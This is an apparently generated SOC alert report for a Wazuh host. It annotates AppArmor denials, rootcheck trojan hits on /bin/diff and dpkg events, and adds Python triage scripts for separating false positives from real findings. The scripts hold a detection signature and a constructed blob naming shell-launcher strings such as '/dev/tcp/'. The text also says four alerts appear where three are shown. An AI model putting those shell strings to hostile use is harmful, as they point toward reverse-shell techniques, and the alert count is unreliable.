🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.12705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.576996+00:00 server1 kernel: audit: type=1400 audit(1745533322.575:1030): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/urls.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.576996+00:00
Timestamp the predecoder lifted from the syslog header of the raw line, i.e. when the kernel logged it; the top‑level timestamp above is when the manager processed it. The gap between the two is ingestion lag and should stay in the milliseconds.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
AppArmor's decision for this access. DENIED means the confined process was actually blocked; ALLOWED (profile in complain mode) or AUDIT (permitted but audited) would mean the access went through and was only logged.

data.extra_data:  mknod
For AppArmor events the decoder stores the operation here. mknod with requested_mask="c" is a plain file create, and the target is a Python bytecode cache temp file (importlib writes <module>.pyc.<id> and renames it into place), so profile ubuntu_pro_esm_cache is stopping its confined python3 from caching bytecode under /usr/lib/python3. A blocked, low‑impact write by a system service; confirm that profile, comm and path fit this pattern before closing it as noise.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.13346
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.541946+00:00 server1 kernel: audit: type=1400 audit(1745533322.540:1027): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/exceptions.cpython-312.pyc.124504253410736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.541946+00:00
Timestamp the predecoder lifted from the syslog header of the raw line, i.e. when the kernel logged it; the top‑level timestamp above is when the manager processed it. The gap between the two is ingestion lag and should stay in the milliseconds.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
AppArmor's decision for this access. DENIED means the confined process was actually blocked; ALLOWED (profile in complain mode) or AUDIT (permitted but audited) would mean the access went through and was only logged.

data.extra_data:  mknod
For AppArmor events the decoder stores the operation here. mknod with requested_mask="c" is a plain file create, and the target is a Python bytecode cache temp file (importlib writes <module>.pyc.<id> and renames it into place), so profile ubuntu_pro_esm_cache is stopping its confined python3 from caching bytecode under /usr/lib/python3. A blocked, low‑impact write by a system service; confirm that profile, comm and path fit this pattern before closing it as noise.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.13984
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.572878+00:00 server1 kernel: audit: type=1400 audit(1745533322.569:1029): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/__init__.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.572878+00:00
Timestamp the predecoder lifted from the syslog header of the raw line, i.e. when the kernel logged it; the top‑level timestamp above is when the manager processed it. The gap between the two is ingestion lag and should stay in the milliseconds.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
AppArmor's decision for this access. DENIED means the confined process was actually blocked; ALLOWED (profile in complain mode) or AUDIT (permitted but audited) would mean the access went through and was only logged.

data.extra_data:  mknod
For AppArmor events the decoder stores the operation here. mknod with requested_mask="c" is a plain file create, and the target is a Python bytecode cache temp file (importlib writes <module>.pyc.<id> and renames it into place), so profile ubuntu_pro_esm_cache is stopping its confined python3 from caching bytecode under /usr/lib/python3. A blocked, low‑impact write by a system service; confirm that profile, comm and path fit this pattern before closing it as noise.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
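
The four rule 52004 alerts above are one burst. The script below is an added example, not SOCscribe or Wazuh code: it parses the four full_log lines (copied from this page) the way an analyst wants them pre‑digested, splitting the AppArmor key=value fields, tagging a create (mask c) of a <module>.pyc.<id> file under /usr/lib/python3 by a confined python3 as bytecode‑cache noise, and escalating anything that is an exec denial or touches a scratch directory. The prefix lists, the verdict names and the contrast line (a constructed exec denial under /tmp, not from this page) are this example's assumptions.

```python
import re
from collections import Counter

# Raw kernel lines copied from the full_log field of the four rule 52004 alerts above.
PAGE_LINES = [
    '2025-04-24T22:22:02.548927+00:00 server1 kernel: audit: type=1400 audit(1745533322.547:1028): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_apt_news" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/apt.cpython-312.pyc.132628381801856" pid=76916 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0',
    '2025-04-24T22:22:02.576996+00:00 server1 kernel: audit: type=1400 audit(1745533322.575:1030): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/urls.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0',
    '2025-04-24T22:22:02.541946+00:00 server1 kernel: audit: type=1400 audit(1745533322.540:1027): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/exceptions.cpython-312.pyc.124504253410736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0',
    '2025-04-24T22:22:02.572878+00:00 server1 kernel: audit: type=1400 audit(1745533322.569:1029): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/__init__.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0',
]

# Constructed contrast line (assumption, not from this page): same profile, but an
# exec denial of a file under /tmp, which must not be closed as cache noise.
CONSTRUCTED_LINE = (
    '2025-04-24T22:30:00.000000+00:00 server1 kernel: audit: type=1400 audit(1745533800.000:1100): '
    'apparmor="DENIED" operation="exec" class="file" profile="ubuntu_pro_esm_cache" '
    'name="/tmp/.cache/helper" pid=77001 comm="python3" requested_mask="x" denied_mask="x" fsuid=0 ouid=1000'
)

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
AUDIT_RE = re.compile(r'audit\((\d+\.\d+):(\d+)\)')
# importlib writes bytecode to "<module>.pyc.<id>" and renames it into place, so a
# create on that name pattern is the interpreter caching bytecode.
PYCACHE_TMP_RE = re.compile(r'/__pycache__/[^/]+\.cpython-\d+\.pyc(?:\.\d+)?$')
SYSTEM_PY_PREFIXES = ('/usr/lib/python3', '/usr/local/lib/python3')   # assumption
SCRATCH_PREFIXES = ('/tmp/', '/var/tmp/', '/dev/shm/')                # assumption


def parse_apparmor(line):
    """Return the key=value fields of one AppArmor audit line as a dict, or None."""
    if 'apparmor=' not in line:
        return None
    ev = {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}
    m = AUDIT_RE.search(line)
    if m:
        ev['audit_epoch'], ev['audit_serial'] = float(m.group(1)), int(m.group(2))
    for key in ('pid', 'fsuid', 'ouid'):
        if key in ev:
            ev[key] = int(ev[key])
    return ev


def triage(ev):
    """Verdict for one parsed event: noise, escalate, review or info."""
    if ev.get('apparmor') != 'DENIED':
        return 'info'          # ALLOWED/AUDIT: complain mode or an audit rule, access went through
    name = ev.get('name', '')
    if (ev.get('operation') == 'mknod' and ev.get('requested_mask') == 'c'
            and ev.get('comm') == 'python3'
            and name.startswith(SYSTEM_PY_PREFIXES) and PYCACHE_TMP_RE.search(name)):
        return 'noise:bytecode-cache'
    if 'x' in ev.get('denied_mask', '') or name.startswith(SCRATCH_PREFIXES):
        return 'escalate'      # blocked exec, or activity in a world-writable scratch dir
    return 'review'


def summarize(lines):
    """Collapse a burst into {(profile, verdict): count}, one row per decision to make."""
    counts = Counter()
    for line in lines:
        ev = parse_apparmor(line)
        if ev is not None:
            counts[(ev.get('profile'), triage(ev))] += 1
    return dict(counts)


if __name__ == '__main__':
    for (profile, verdict), n in sorted(summarize(PAGE_LINES + [CONSTRUCTED_LINE]).items()):
        print(f'{profile:22s} {verdict:22s} x{n}')
```

Run as a script it collapses the burst to one line per profile and verdict. The noise verdict deliberately requires all four conditions (operation, mask, interpreter, path pattern); relax any one of them and real denials from the same profile start disappearing into the noise bucket.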

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:03.900+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:03.900+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533323.14629
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives. Here it also says what was tested: the 'Generic' signature is a regex run over the printable strings inside the binary, so a hit means a string such as /bin/sh or /dev/tty was found in the file, not that the file was modified. Verify against the package before escalating: dpkg -V diffutils (or debsums -c) reports the path only if its checksum no longer matches what the package shipped.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /bin/diff
Path rootcheck scanned. On a merged‑/usr Ubuntu host /bin is a symlink to /usr/bin, so expect a twin alert for /usr/bin/diff: same inode, scanned twice under two names.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:03.919+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:03.919+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533323.15004
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives. Same signature and same reasoning as the /bin/diff alert above: a string‑pattern hit, not a checksum mismatch. One dpkg -V diffutils check answers both alerts.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /usr/bin/diff
Path rootcheck scanned. This is the same binary as the /bin/diff alert above (/bin is a symlink to /usr/bin on a merged‑/usr host), so treat the two alerts as one finding.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
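
What the two rule 510 alerts above actually tested is the 'Generic' signature quoted in full_log: a pattern matched against the printable strings inside the binary. The added example below (not Wazuh's rootcheck code) reimplements that check so you can see which string produced the hit, and resolves the /bin and /usr/bin paths to one file. Assumptions: Python's re stands in for the OSSEC regex engine, the two byte blobs are constructed stand‑ins for a binary's string table (not the real diff), and the temporary directory layout imitates a merged‑/usr host.

```python
import os
import re
import tempfile

# Signature copied from the full_log of the two rule 510 alerts above.
GENERIC_SIG = r'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh'
# Assumption: Python's re stands in for the OSSEC regex engine; as there, '^' anchors
# each extracted string, not the whole file.
SIG_RE = re.compile(GENERIC_SIG)
STRINGS_RE = re.compile(rb'[\x20-\x7e]{4,}')   # printable runs of 4+ bytes, like strings(1)

# Constructed stand-in for a stock tool's string table (not the real diff binary).
STOCK_LIKE = (b'\x7fELF\x02\x01\x01' + b'\x00' * 9
              + b'Usage: %s [OPTION]... FILES\x00'
              + b'/dev/null\x00'        # no hit: "/dev/" followed by "n"
              + b'/dev/stdin\x00'       # hit: matches /dev/[^n]
              + b'missing operand after %s\x00')
# Constructed stand-in for a binary that embeds a shell launcher.
SUSPECT_LIKE = b'\x7fELF' + b'\x00' * 12 + b'/bin/sh -c\x00/bin/bash\x00/dev/tcp/\x00'


def printable_strings(blob):
    """Pull the printable ASCII runs out of a byte blob: the input the signature sees."""
    return [s.decode('ascii') for s in STRINGS_RE.findall(blob)]


def signature_hits(blob, sig=SIG_RE):
    """Strings in blob that satisfy the signature; empty means rootcheck would stay quiet."""
    return [s for s in printable_strings(blob) if sig.search(s)]


def dedupe_paths(paths):
    """Group reported paths by what they resolve to, so /bin/x and /usr/bin/x count once."""
    groups = {}
    for p in paths:
        groups.setdefault(os.path.realpath(p), []).append(p)
    return groups


def merged_usr_demo():
    """Temp layout with bin -> usr/bin, as on a merged-/usr host; returns {realpath: alias count}."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'usr', 'bin'))
        os.symlink(os.path.join(root, 'usr', 'bin'), os.path.join(root, 'bin'))
        target = os.path.join(root, 'usr', 'bin', 'diff')
        with open(target, 'wb') as fh:
            fh.write(STOCK_LIKE)
        groups = dedupe_paths([os.path.join(root, 'bin', 'diff'), target])
        return {real: len(aliases) for real, aliases in groups.items()}


if __name__ == '__main__':
    print('stock-like hits  :', signature_hits(STOCK_LIKE))
    print('suspect-like hits:', signature_hits(SUSPECT_LIKE))
    print('merged-/usr view :', merged_usr_demo())
```

A hit on a string such as /dev/stdin is exactly how a stock binary trips this signature. The deciding check is whether the on‑disk file still matches the package: dpkg -V diffutils (or debsums -c) reports the path only if its checksum differs from what the package shipped. A clean result plus both alerts resolving to one realpath closes this as a false positive; a mismatch turns it into an incident.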

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:54.221+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:54.221+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
GPG 13 mapping – UK Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533374.15387
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:53 status half-configured linux-libc-dev:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state dpkg recorded in /var/log/dpkg.log at this step, not the result of a query. A normal install or upgrade passes through unpacked and half‑configured on its way to installed, so half‑configured alone is transient; it only matters if a package is still there once apt has finished (dpkg --audit lists those), which means its postinst script failed.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Architecture the package was built for, not the host CPU: amd64 here; architecture‑independent packages show all.

data.version:  6.8.0-57.59
Package version on this log line. Compare it with the version on the next dpkg event for the same package: a different version means an upgrade, the same version means a reconfigure of what was already installed.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:54.678+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:54.678+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
GPG 13 mapping – UK Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533374.15874
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Package state dpkg recorded in /var/log/dpkg.log at this step, not the result of a query. A normal install or upgrade passes through unpacked and half‑configured on its way to installed, so half‑configured alone is transient; it only matters if a package is still there once apt has finished (dpkg --audit lists those), which means its postinst script failed.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
Architecture the package was built for, not the host CPU: all means architecture‑independent content (scripts, data), so it is not a CPU type to match against.

data.version:  6.8.0-57.59
Package version on this log line. Compare it with the version on the next dpkg event for the same package: a different version means an upgrade, the same version means a reconfigure of what was already installed.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.222+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.222+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
GPG 13 mapping – UK Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr:  ['IV_35.7.d']
